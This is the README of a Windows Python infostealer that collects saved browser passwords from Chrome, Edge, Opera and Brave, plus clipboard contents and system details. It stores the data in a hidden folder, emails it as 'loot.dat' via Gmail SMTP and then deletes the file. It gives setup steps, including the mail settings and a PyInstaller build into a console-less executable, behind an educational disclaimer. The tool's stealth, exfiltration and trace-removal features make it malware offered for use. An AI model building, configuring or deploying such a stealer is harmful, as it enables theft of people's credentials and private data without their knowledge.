This code is designed to steal browser passwords, clipboard data, and system information, then exfiltrate that sensitive data via email.
Version: 1.0
Platform: Windows
This tool is strictly for educational, research, and security awareness demonstrations on systems you own or have explicit written permission to audit. Unauthorized running of this software is illegal and unethical! The authors disclaim all liability for misuse.
This Python-based script demonstrates how browser-stored credentials, basic system information, and clipboard data can be programmatically harvested from a Windows user account and securely exported via email.
The data is written to a stealth location (SysDataHidden) and automatically sent to a user-specified mail address before the trace file is deleted.
It illustrates:
- Real-world security risks when local machines are compromised (for blue teams & educators).
- How browsers store and encrypt saved passwords on disk.
- The importance of endpoint and credential hygiene.
- 🕵️♂️ Extracts Chrome, Edge, Opera, Opera GX, and Brave saved credentials.
- 💡 Decrypts passwords using system APIs (as browsers would).
- 🖥️ Collects OS and network fingerprint information.
- 📋 Reads clipboard contents (what’s currently copied).
- 🤫 Report file is saved to a hidden OS folder, then deleted after emailing.
- ✉️ Data is emailed to a trusted mailbox via secure Gmail SMTP.
- Windows 10/11 system.
- Python 3.7+ (tested up to 3.11+).
- The following modules installed:
pip install pyperclip pycryptodome requests pypiwin32 - Gmail account with App Passwords (when 2-Step Verification enabled).
Edit these lines at the top of main.py:
SENDER_EMAIL = "[email protected]" # Your Gmail address APP_PASSWORD = "abcd efgh ijkl mnop" # Gmail App Password (not your real password!) RECIPIENT_EMAIL = "[email protected]" # Where to send the loot.dat
Never share your real password. Always use an App Password for scripts!
-
Via Terminal:
python info.py -
To create an .exe (no console):
-
-
Install PyInstaller:
pip install pyinstaller -
Build:
pyinstaller --onefile --windowed info.py -
Find the executable in
/dist.
-
- Check the email inbox set in
RECIPIENT_EMAILfor the attachedloot.dat. - File contents will include all extracted browser credentials, system info, and clipboard data at the time of execution.
- The loot file is auto-deleted from disk after being sent.
- Try running the script with/without browsers open to see what changes in extraction results.
- Review loot.dat contents and spot the sensitive data exposed.
- Use this exercise to teach defense:
- The risk of unlocked user sessions
- Why to avoid storing passwords in browsers
- The importance of endpoint protections (anti-malware, EDR, OS security).
- Do NOT run on other people's devices or networks.
- Do NOT send extracted data over untrusted channels or third-party systems.
- Inform users before running any extraction demos.
- Delete all loot files from your environment after teaching.
This is a demonstration and teaching script provided "AS IS".
You are responsible for any use, authorized or unauthorized.